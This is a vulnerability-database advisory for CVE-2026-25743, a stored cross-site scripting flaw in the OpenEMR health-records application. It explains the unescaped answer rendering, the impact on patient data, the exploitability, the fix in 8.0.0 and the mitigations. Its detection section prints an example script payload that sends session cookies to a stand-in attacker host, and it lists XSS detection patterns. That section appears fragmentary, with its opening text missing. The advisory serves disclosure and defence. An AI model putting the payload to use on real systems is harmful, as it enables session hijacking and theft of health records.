
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-25743 is a stored cross-site scripting (XSS) vulnerability in OpenEMR, a widely used open-source electronic health records (EHR) and medical practice management application. It affects all versions prior to 8.0.0 (confirmed affected version: 7.0.4 and earlier). The vulnerability was disclosed on February 25, 2026, with a patch released in version 8.0.0. It carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 7.2 (High) (GitHub Advisory, Feedly).
The root cause is improper neutralization of user-controlled input during web page generation (CWE-79). In src/Services/QuestionnaireResponseService.php, the renderItem() function directly interpolated unsanitized answer values into HTML output ($html .= "{$answerValue}\n";) without escaping, allowing arbitrary JavaScript to be stored and later rendered in the browser. An attacker with the "Forms administration" role can enter a malicious JavaScript payload (e.g., <script>...</script>) into a questionnaire form answer field during a patient encounter. The payload is stored server-side and executes in the browsers of any user with the same role who subsequently views the encounter page or visit history. The fix wraps the answer value with the text() escaping function before rendering (GitHub Advisory, Patch Commit).
Successful exploitation allows an authenticated attacker to inject persistent JavaScript that executes in the browsers of other users with the "Forms administration" role when they view patient encounter pages or visit history. This can result in session hijacking, credential theft, unauthorized actions performed on behalf of legitimate users, and exfiltration of sensitive patient health records. Given that OpenEMR handles protected health information (PHI), exploitation could constitute a HIPAA-reportable breach and severely undermine application integrity and patient data confidentiality (GitHub Advisory).
A proof-of-concept is referenced in the GitHub Security Advisory, but there is no evidence of active in-the-wild exploitation at this time. The EPSS score is approximately 0.0029 (0.29%), indicating a low probability of exploitation in the near term. Exploitation requires an authenticated account with the "Forms administration" role and user interaction (a victim must view the compromised form), limiting the attack surface. No threat actor attribution or CISA KEV catalog listing has been identified (GitHub Advisory, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-based variant.<script>, onerror=, onmouseover=) in form answer parameters.QuestionnaireResponseService) containing raw HTML or JavaScript strings in answer value fields rather than plain text.Upgrade OpenEMR to version 8.0.0 or later, which applies the fix by wrapping answer values with the text() HTML-escaping function in QuestionnaireResponseService.php (Patch Commit). If immediate patching is not feasible, restrict the "Forms administration" role to the minimum number of trusted users and monitor their activity closely. Additionally, implementing a strict Content Security Policy (CSP) header can reduce the impact of XSS exploitation, though it does not remediate the underlying vulnerability (GitHub Advisory).
The vulnerability was reported by researcher "lassiiiiii" and remediated by developer "kojiromike" (Michael A. Smith), with the advisory published by OpenEMR maintainer "bradymiller" on February 25, 2026. Red Hat has tracked the CVE in their security database. No significant broader media coverage or notable social media discussion has been identified beyond standard vulnerability database aggregation (GitHub Advisory, Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."